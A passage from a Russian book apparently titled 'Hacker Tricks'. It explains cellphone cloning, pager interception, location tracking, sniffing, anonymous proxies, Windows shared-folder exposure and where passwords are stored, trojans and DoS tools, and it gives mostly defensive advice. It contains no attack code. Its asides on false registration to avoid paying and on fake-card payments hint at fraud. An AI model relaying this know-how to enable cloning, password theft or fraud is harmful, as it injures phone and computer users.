радиоприемниками или сканерами, оборудованными устройствами,
способными декодировать коды ASCII, Baudot, CTCSS, POCSAG и
GOLAY. Существует также целый ряд программных средств, которые
позволяют ПК в сочетании со сканнером автоматически захватывать рабочую
частоту нужного пейджера или контролировать весь обмен в конкретном
канале пейджинговой связи. Эти программы предусматривают
возможность перехвата до 5000 (!) пейджеров одновременно и хранение
всей переданной на них информации.
256 Хакерские трюки
Мошенничество
Мошенничество в сотовых системах связи, известное еще под названием
«клонирование», основано на том, что абонент использует чужой
идентификационный номер (а, следовательно, и счет) в корыстных
интересах. В связи с развитием быстродействующих цифровых сотовых
технологий способы мошенничества становятся все более изощренными,
но общая схема их такова: мошенники перехватывают с помощью
сканеров идентифицирующий сигнал чужого телефона, которым он отвечает
на запрос базовой станции, выделяют из него идентификационные
номера MIN и ESN и перепрограммируют этими номерами микро-
чип своего телефона. В результате стоимость разговора с этого аппарата
заносится базовой станцией на счет того абонента, у которого эти номера
были украдены.
Например, в больших городах Запада, чаще всего в аэропортах, работают
мошенники, которые, клонировав ESN-номер чьего-либо мобильного
телефона, предоставляют за плату возможность другим людям
звонить с этого телефона в отдаленные страны за счет того, чей номер
выкрали.
Кража номеров осуществляется, как правило, в деловых районах
и в местах скопления большого количества людей: шоссе, дорожные
пробки, парки, аэропорты, - с помощью очень легкого, малогабаритного,
автоматического оборудования. Выбрав удобное место и включив
свою аппаратуру, мошенник может за короткий промежуток времени наполнить
память своего устройства большим количеством номеров.
Наиболее опасным устройством является так называемый сотовый
кэш-бокс, представляющий собой комбинацию сканера, компьютера
и сотового телефона. Он легко выявляет и запоминает номера MIN и
ESN и автоматически перепрограммирует себя на них. Использовав пару
MIN/ESN один раз, он стирает ее из памяти и выбирает другую. Такой
аппарат делает выявление мошенничества практически невозможным.
Несмотря на то, что эта аппаратура на Западе пока еще редка и дорога,
•она уже существует и представляет растущую опасность для пользователей
сотовой связи.
Выявление местоположения абонента
Оставим в стороне такую очевидную возможность, как выявление
адреса абонента сотовой системы связи через компанию, предоставляющую
ему эти услуги. Немногие знают, что наличие мобильного сотового
телефона позволяет определить как текущее местоположение его владельца,
так и проследить его перемещения в прошлом.
Хакерские трюки 257
Текущее положение может выявляться двумя способами. Первым
из них является обычный метод триангуляции (пеленгования), определяющий
направление на работающий передатчик из нескольких (обычно
трех) точек и дающий засечку местоположения источника радиосигналов.
Необходимая для этого аппаратура хорошо разработана, обладает
высокой точностью и вполне доступна.
Второй метод - через компьютер предоставляющей связь компании,
который постоянно регистрирует, где находится тот или иной абонент
в данный момент времени даже в том случае, когда он не ведет никаких
разговоров (по идентифицирующим служебным сигналам,
автоматически передаваемым телефоном на базовую станцию, о которых
мы говорили выше). Точность определения местонахождения абонента в
этом случае зависит от целого ряда факторов: топографии местности, наличия
помех и переотражений от зданий, положения базовых станций,
количества работающих в настоящий момент телефонов в данной соте.
Большое значение имеет и размер соты, в которой находится абонент,
поэтому точность определения его положения в городе гораздо выше,
чем в сельской местности (размер соты в городе составляет около 1 км2
против 50-70 км2 на открытой местности) и, по имеющимся данным, составляет
несколько сот метров.
Наконец, анализ данных о сеансах связи абонента с различными
базовыми станциями (через какую и на какую базовую станцию передавался
вызов, дата вызова и т.п.) позволяет восстановить все перемещения
абонента в прошлом. Такие данные автоматически регистрируются в
компьютерах компаний, предоставляющих услуги сотовой связи, поскольку
оплата этих услуг основана на длительности использования системы
связи. В зависимости от фирмы, услугами которой пользуется абонент,
эти данные могут храниться от 60 дней до 7 лет.
Такой метод восстановления картины перемещений абонента
очень широко применяется полицией многих западных стран при расследованиях,
поскольку дает возможность восстановить с точностью до
минут, где был подозреваемый, с кем встречался (если у второго тоже
был сотовый телефон), где и как долго происходила встреча или был ли
подозреваемый поблизости от места преступления в момент его совершения.
Некоторые рекомендации
Проблема безопасности при использовании современных беспроводных
средств связи достаточно серьезна, но, используя здравый смысл
и известные приемы противодействия, ее можно, в той или иной степени,
решить. Не будем затрагивать тех мер, которые могут предпринять
9-2588
258 Хакерские трюки
только провайдеры связи (например, введение цифровых систем). Поговорим
о том, что можете сделать вы сами.
Для предотвращения перехвата информации:
• используйте общепринятые меры по предупреждению
раскрытия информации: избегайте или сведите
к минимуму передачу конфиденциальной информации,
такой как номера кредитных карточек, финансовые
вопросы, пароли. Прибегайте в этих целях к более
надежным проводным телефонам, убедившись, однако,
что ваш собеседник не использует в этот момент
радиотелефон. Не используйте сотовые или беспроводные
телефоны для ведения деловых разговоров;
• помните, что труднее перехватить разговор, который
ведется с движущегося автомобиля, т.к. расстояние между
ним и перехватывающей аппаратурой (если та находится
не в автомобиле) увеличивается и сигнал ослабевает.
Кроме того, при этом ваш сигнал переводится с одной
базовой станции на другую с одновременной сменой
рабочей частоты, что не позволяет перехватить весь
разговор целиком, поскольку для нахождения этой новой
частоты требуется время;
• используйте системы связи, в которых данные передаются
с большой скоростью при частой автоматической смене
частот в течение разговора;
4 используйте, при возможности, цифровые сотовые
телефоны;
• отключите полностью свой сотовый телефон, если не
хотите, чтобы ваше местоположение стало кому-то
известно.
В случае использования беспроводного радиотелефона:
• при покупке выясните, какую защиту он предусматривает;
• используйте радиотелефоны с автоматической сменой
рабочих частот типа «spread spectrum» или цифровые,
работающие на частотах порядка 900 МГц;
при возможности, используйте радиотелефоны со
встроенным чипом для шифрования сигнала.
Хакерские трюки 259
Для предотвращения мошенничества:
• узнайте у фирмы-производителя, какие средства против
мошенничества интегрированы в ваш аппарат;
• держите документы с ESN-номером вашего телефона
в надежном месте;
• ежемесячно и тщательно проверяйте счета на пользование
сотовой связью;
• в случае кражи или пропажи вашего сотового телефона
сразу предупредите фирму, предоставляющую вам услуги
сотовой связи;
• держите телефон отключенным до того момента, пока вы
не решили им воспользоваться. Этот способ самый легкий
и дешевый, но следует помнить, что для опытного
специалиста достаточно одного вашего выхода на связь,
чтобы выявить M1N/ESN номера вашего аппарата;
V регулярно меняйте через компанию, предоставляющую
вам услуги сотовой связи, MIN-номер вашего аппарата.
Этот способ несколько сложнее предыдущего и требует
времени;
• попросите компанию, предоставляющую вам услуги
сотовой связи, установить для вашего телефона
дополнительный 4-хзначный PIN-код, набираемый перед
разговором. Этот код затрудняет деятельность
мошенников, так как они обычно перехватывают только
МШи ESN-номера, но, к сожалению, небольшая
модификация аппаратуры перехвата позволяет выявить
и его;
4 наиболее эффективным методом противодействия
является шифрование MIN/ESN номера (вместе с
голосовым сигналом) по случайному закону. Но этот метод
дорог и пока малодоступен.
Глава 24.
Сниффинг
В отличие от телефонной сети, компьютерные сети используют
общие коммуникационные каналы, т.к. достаточно дорого тянуть петлю
до каждого узла. Совместное использование каналов подразумевает, что
260 Хакерские трюки
узел может получать информацию, которая предназначается не ему. «Отлов
» этой информации в сети и называется sniff ингом.
Наиболее простой способ соединения компьютеров - ethernet.
Обмен данными по протоколу Ethernet подразумевает посылку пакетов
всем абонентам сети. Заголовок пакета содержит адрес узла-приемника.
Предполагается, что только узел с соответствующим адресом может
принять пакет. Однако через каждый узел проходят все пакеты, невзирая
на их заголовки.
Так как в обычной сети информация о паролях передается по
ethernet в виде текста - нет ничего сложного, вытягивая и анализируя
пакеты, проходящие по сети, получить информацию обо всех компьютерах
сети.
Область применения сниффинга
SniffHHr- один из наиболее популярных видов атаки, используемых
хакерами. Программный Sniff ер называемый Esniff.c - очень маленький,
разработанный для работы на SunOS, занимался тем, что вылавливал
первые 300 байт telnet, ftp и rlogin-сессий. Он был опубликован
в «Phrack» - одном из наиболее широко доступных подпольных хакер-
ских журналов. Вы его можете найти на многих FTP-сайтах. Например,
на ftp://coombs.anu.edu.au/pub/net/log.
Глава 25.
Общие принципы работы Оп-Ыпеуслуг
До последнего времени работа в TCP/IP и Х.25 сетях требовала некоторых
профессиональных знаний и навыков, не всегда доступных для
обычных пользователей компьютеров. Вероятно, поэтому были созданы
сервисы, для работы с которыми не требуется профессиональных знаний.
Пользователь, заплатив некоторую сумму денег, получает доступ к
необходимым ему информационным ресурсам с помощью некой программы-
оболочки или просто в диалоговом режиме.
Доступ к разнообразным On-Line услугам осуществляется в том
числе и по сетям пакетной коммутации (Х.25). Поскольку сети х.25 широко
распространены и общедоступны, то общение с On-Line-сервисами
не представляет никакого труда. В рекламных целях продавцы этих услуг
помещают программы, необходимые для работы в качестве бонуса к модемам,
а также предоставляют несколько условно-бесплатных часов работы
с их сервисом.
Хакерские трюки 261
Большинство On-Line сервисов предоставляет свои услуги на основе
данных, полученных от работающих с ними пользователей. Так как
часто при работе через Х.25 местоположение пользователя не проверяется,
то существует возможность указать при регистрации некорректные
сведения о пользователе и о его финансовых возможностях. На этом
принципе построены альтернативные методы оплаты за On-Line
услуги...
Глава 26.
По WWW без следов
Путешествуя по Internet, мы не часто задумываемся о том, что оставляем
следы своих посещений каждый раз, когда заходим на какой-либо
сайт. Пожалуй, об этом и не стоило бы беспокоиться, если бы не был
так велик тот объем информации, который потенциально могут добыть о
нас владельцы сайта. Стандартные log-файлы, хитроумные скрипты и
прочие ухищрения любопытных владельцев способны узнать о вас многое:
тип компьютера и операционной системы, страну пребывания, название
и адрес провайдера и, зачастую, даже адрес электронной почты
и ваше имя.
Существует много причин, по которым пользователь может не захотеть
оставлять следы своего пребывания. Тут и нежелание раскрыть
свой адрес электронной почты, чтобы не стать жертвой спама, и необходимость
получить информацию с сайта, который варьирует ответ в зависимости
от страны, из которой отправлен запрос. Или, например, вы частенько
заходите на Web-узел ваших конкурентов и хотите делать это
анонимно.
Некто, поддерживающий работу сайта своей юридической фирмы,
регулярно составляет график его посещения самыми серьезными
конкурентами его фирмы, которые проводят там довольно много времени,
что, вкупе с ситуацией на рынке юридических услуг, дает богатую информацию
к размышлению.
Кроме того, существуют такие бяки, как cookies, да и дыры в безопасности
в MSIE обнаруживаются все новые и новые... В общем, не послать
ли нам в путешествие по WWW кого-нибудь еще? Идея трезвая
и достаточно легко выполнимая, причем несколькими способами.
Анонимайзер
Осуществить подобный анонимный серфинг позволяет служба
Anonymteer. Зайдите на их сайт, наберите нужный URL, и вперед! От-
262 Хакерские трюки
правляясь по ссылке, помещенной на странице, которую вы просматриваете
с помощью Анонимайзера, вы попадаете на очередную страницу
снова через Анонимайзер, так что процесс автоматизирован, и набирать
новый URL снова не нужно. Были времена, когда Анонимайзер отправлялся
по указанному адресу немедленно, теперь же для тех, кто пользуется
этой службой бесплатно, существует 30-секундныйпериод ожидания.
Кроме того, Анонимайзер позволял использовать как HTTP, так и
FTP-ресурсами. Теперь же использовать FTP могут лишь зарегистрированные
пользователи.
При использовании этой службы след в log-файлах оставляете не
вы, а Анонимайзер, что исключает возможность сбора всей той информации,
о которой было написано выше. Никакие cookies до вас не доходят.
Некоторые сайты, например, Web chat rooms и отдельные почтовые
службы, через него недоступны, что, очевидно, объясняется желанием их
владельцев следить за посетителями. Анонимайзер также не работает
с безопасными узлами, использующими SSL-протокол.
Анонимайзер имеет еще две приятные особенности. Во-первых,
некоторые сайты WWW бывают недоступны из одного места, но доступны
из другого. Недавно автор в течении 20 минут безуспешно пытался
попасть на один сайт в Австралии, находясь в России. Использование
Анонимайзера немедленно проблему решило, и долгожданная страница
быстро загрузилась.
Во-вторых, некоторые сайты выдают вам информацию в зависимости
от того, откуда поступает ваш запрос. Пример из жизни. Находясь
на сайте Encyclopaedia Britannica, автор захотел выяснить цены на продукцию
этой фирмы. Нажатие на кнопку Order Information привело его на
страницу, содержащую список дилеров по всему миру, включая и московского
дилера - «Мир Знаний». Заход на ту же страницу через Анонимайзер
дал совершенно другой результат: на экране появился
прайс-лист. Сравнение показало, что в Москве Encyclopaedia Britannica
CD'97 продается во много раз дороже, чем в Штатах. Мораль: пользуйтесь
АнонимаЙзером и не покупайте ничего в «Мире Знаний».
Служба iproxy
Эта служба, располагающаяся по адресу ww.iproxy.com, работает
подобно Анонимайзеру. От пользователя требуется заполнить небольшую
анкету, указать свой электронный адрес, и после получения подтверждения
по электронной почте и ответа на это подтверждение можно
отправляться в путь, причем без 30-секундных задержек, как в случае с
Анонимайзером. Обмен подтверждениями несколько настораживает,
обнаруживая то, что владельцам службы на самом деле на privacy напле-
Хакерские трюки 263
вать, но, поскольку получить анонимный адрес - не проблема, а работает
iproxy быстрее Анонимайзера, представляется разумным использовать
эту службу. Единственное «но» - сервер иногда бывает в «дауне», причем
это может продолжаться целую неделю.
Прокси-серверы
Анонимизировать путешествие по сети можно также с помощью
прокси-сервера. Прокси-сервер работает, по сути, какАнонимайзер, т.е.
документ с сайта «забирает» он, а не вы. Правда, есть некоторые немаловажные
отличия, а именно:
• от cookies вас прокси не избавляет (избавьте от них себя
сами, сделайте файл cookies.txt read-only, и все дела!);
• прокси сервер работает как с HTTP, так и с FTP, что дает
возможность анонимизировать посещение не только
Web-сайтов, но и FTP-архивов. Вообще говоря,
прокси-серверы поддерживают и другие протоколы, но
для анонимного путешествия по сети они мало значимы;
• IP-адрес вашего родного прокси-сервера, т.е. того,
пользование которым обеспечивает ваш провайдер, все
равно отражает имя вашего домена или, по крайней мере,
его примерное географическое положение.
Последний пункт приводит нас к следующему выводу: если вам
очень важно остаться анонимным при работе с каким-нибудь сайтом или
при чтении и отправке почты с использованием обозревателя, используйте
не свой прокси-сервер, а чужой.
Большинство прокси-серверов ограничивают доступ на основании
IP-адреса, с которого происходит обращение. Иными словами, если
вы пользуетесь провайдером Demos, то прокси-сервер Glasnet вас к себе
попросту не пустит. Но, к счастью, в сети всегда можно найти «добрый»
прокси, владельцы которого либо открыто заявляют о его доступности
для всех желающих, либо прокси, который по той или иной причине не
ограничивает доступ только своим доменам, о чем широкой публике не
известно,
Далеко не все прокси-серверы являются полностью анонимными.
Некоторые из них позволяют администратору сайта, который вы посещаете
с использованием прокси, при желании определить IP-адрес, с которого
происходит обращение к прокси, т.е. ваш реальный IP-адрес.
Если вы получите сообщение Proxy server is detected! - ваш прокси
имеет «дыру», и вам будет предоставлена информация о вашем реальном
264 Хакерские трюки
IP-адресе, как, впрочем и об IP-адресе прокси-сервера, который вы используете.
Если же сообщение гласит: Proxy server is not detected - все
в порядке!
В заключение еще несколько соображений касательно использования
прокси-серверов. Работа через далеко расположенный прокси
снижает скорость передачи данных и время ожидания. Прокси, настроенный
на HTTP-протокол, не анонимизирует работу с SSL-узлами, работающими
по протоколу HTTPS (это для вас, любители расплатиться
фиктивной кредитной карточкой).
Глава 27.
Атака
Во-первых, пусть название главы вас не пугает... или пугает, но не
очень сильно. Речь идет всего лишь о том, что когда компьютер подключен
к сети, он становится ее частью. К сожалению, большинство пользователей
забывает об этой совершенно тривиальной истине. Меж тем забывать
о ней не стоит, ибо несколько практических выводов, которые из
нее следуют, таковы:
Вы имеете доступ к миллионам компьютеров Internet,
а миллионы компьютеров Internet зачастую имеют доступ
к вашему компьютеру.
4 Загружая программы из сети, вы можете заполучить на
свой диск программу-троянца или вирус.
• Любой компьютер в сети подвержен различным
техническим атакам, которые могут привести к его
зависанию, потере данных и прочим прелестям.
Ну, а теперь рассмотрим все это подробнее, спокойно и без истерик.
Разговор пойдет о компьютерах, работающих под Windows 95/
98/NT. Знатоки (опытные пользователи, гуру, хакеры) могут удалиться,
начинающие (неопытные пользователи, женщины, дети, военные) могут
остаться.
Доступ к компьютеру
Примерно к четверти или трети всех компьютеров под Windows
в сети можно получить доступ за пару минут. Этот печальный факт объясняется
тем, что сами пользователи (или глупые системные администраторы)
конфигурирую компьютер таким образом, что его папки или
целые диски становятся доступными для чтения и записи с удаленных
Хакерские трюки 265
компьютеров. Формально это называется File and Print Sharing. Если вы
щелкнете по иконке Network в Control Panel, то увидите эту кнопку. И если
флажок I want to be able to give others access to my files включен, то стоит
задуматься.
Почему пользователи дают доступ к своим файлам - наверное,
понятно. Самая распространенная ситуация - в доме два компьютера,
соединенных в маленькую сеть. Скрывать друг от друга нечего, поэтому
дается свободный доступ сразу ко всему. Или человеку нужно переписать
данные с десктопа на ноутбук. Илив небольшой фирме стоит локальная
сеть. Или вы просто любите на разные незнакомые кнопки нажимать...
Ну, а где доступ с соседнего компьютера, там и доступ из Internet.
Остановимся на том, к чему могут привести путешествия других
людей по вашим дискам и как этого избежать. Во-первых, у вас могут украсть
приватную информацию, что крайне неприятно. Файлы могут также
вообще стереть, что, пожалуй, еще неприятнее.
Но, как правило, крадут другое, особенно если крадут русские: пароли.
Особенности национального менталитета («Халява!») приводят к
тому, что масса малолетних бездельников только и занимается тем, что
крадет пароли доступа к Internet с чужих компьютеров, благо устройство
Windows 95/98 и большинства программ к этому располагает.
Пароли хранятся просто по всему диску, обычно в слабозашифро-
ванном виде. Dial-Up-пароли - в файлах .PWL, почтовые пароли к
Outlook - в реестре, к Eudora - в eudora.ini, к FTP-сайтам (включаю вашу
персональную страничку) - в разных файлах FTP-клиентов, пароли
Windows NT - в файлах SAM, и т.д., и т.п. Появилось множество программ,
которые способны эти пароли извлекать, и целые коллекции таких
программ, например на сайте Russian Password Crackers есть несколько
программ для работы с .PWL-файлами. Так что пусть звездочки в окне
ввода пароля вас не обнадеживают, а вот свободный доступ к файлам
своего компьютера лучше ограничить.
Как это сделать? Windows 95/98 и Windows NT по-разному обеспечивают
удаленный доступ. В первом случае, как правило, используется
share-access control (доступ на основании только пароля), во втором -
user-access control (на основании пары имя-пароль).
Для пользователей Windows 95/98 самое простое решение - от¬
ключить File and Print Sharing, если он вам уже не нужен. Можно также
убрать привязку File and Print Sharing к протоколу TCP/IP (Control
Panel Ф Network О TCP/IP О Properties О Bindings), что эффективно заблокирует
доступ к общим ресурсам из Internet. Если же доступ нужен, то
ставьте пароли на общие папки и диски, причем, желательно, сложные
266 Хакерские трюки
пароли. Имейте также в виду, что существует возможность «взобраться
вверх по дереву», то есть если на диске С: есть папка SomeStufс открытым
доступом, то до корня С: тоже могут добраться. Ну, а вообще
Windows 95/98 - операционная система слабо защищенная, и никакой
гарантии безопасности дать, увы, не может.
В качестве развлекательной программы можно установить
NetWatcherPro (245K, freeware), которая включает сирену каждый раз,
когда кто-то ломится в компьютер. При этом показывается IP-адрес атакующего
и те файлы и папки, которые визитер просматривает. Очень познавательно!
Если доступ хотя бы к одной папке открыт, сирену будете
слышать, как минимум, раз в час.
А кони все скачут и скачут...
Какие кони? Троянские! Троянцами называют программы, которые,
на первый взгляд, выполняют некие полезные функции, но на самом
деле либо разрушают систему, либо отдают контроль в руки другого
человека. Пород троянцев множество: некоторые из них вообще не выполняют
полезных функций, а просто скрытно «живут» на диске и делают
разные гадости, а некоторые, наоборот, совершенно не скрываются
от пользователя, при этом производя некоторые манипуляции, о которых
никто не подозревает (или не должен подозревать). Пример первой
породы - всем известный Back Orifice, дающий врагу почти полный
контроль над вашим компьютером и для вас невидимый. Пример второй
породы - MS Internet Explorer, который при соединении с сайтом
Microsoft развивает совершенно бешеную активность по пересылке данных
с компьютера на сервер, объем которых явно превосходит простой
запрос HTML документа.
Попасть троянец на компьютер может двумя основными способами:
либо вам его «положат» на диск, либо вы его сами себе скачаете.
Множество людей получают подобные программы себе на диск
каждый день. Не стоит скачивать программы с неизвестных сайтов, поддавшись
на обещания авторов дать вам «сУпЕр КрУТУю МочИлкУ
против ДаммерОв» или классный вьюердля бесплатной порнухи. Не надо
также открывать attachments, пришедшие с почтой от незнакомых
людей.
В ваше отсутствие какая-нибудь добрая душа может просто переписать
троянца на компьютер с дискеты (не оставляйте компьютеры без
присмотра!). Кроме того, троянца могут положить из сети прямо на диск,
пока вы, ничего не подозревая, мило беседуете в IRC или гуляете по сайту
Netscape.
Хакерские трюки 267
Некоторых, особенно распространенных троянцев способны обнаруживать
антивирусные программы, например, AntiViral Toolkit Pro.
Имейте в виду, что всех троянцев ни одна программа обнаружить не может,
и можно спокойно рассмеяться в лицо тому производителю софта,
который пытается убедить вас в обратном.
Технические атаки
На самом деле, термин «Технические атаки» не очень точен. Все
атаки, по сути, технические. Здесь имеются в виду атаки из сети, направленные
на технический вывод из строя компьютера, как правило, на короткое
время, нужное для перезагрузки. По-английски такие атаки называются
Denial of service (DOS) attacks. К privacy это прямого отношения
не имеет, но раз уж зашел разговор об атаках, то упомянем и о них.
Симптомы «болезни» таковы: неожиданно компьютер, подключенный
к сети, зависает, либо появляется голубой «экран смерти» - сообщение
об ошибке. Лечение простое - Alt-Ctrl-Del.
Инструментарий для таких атак водится в сети в большом количестве,
не меньше и недоумков, которые получают наслаждение от того,
что заваливают чей-то компьютер. Самый известный представитель
славного семейства - Winnuke, уложивший в свое время миллионы компьютеров
под управлением Windows. Менее известны bonk, smurf, ping of
death... нет им числа. Почти от всех подобных атак можно защититься,
регулярно скачивая патчи с сайта Microsoft.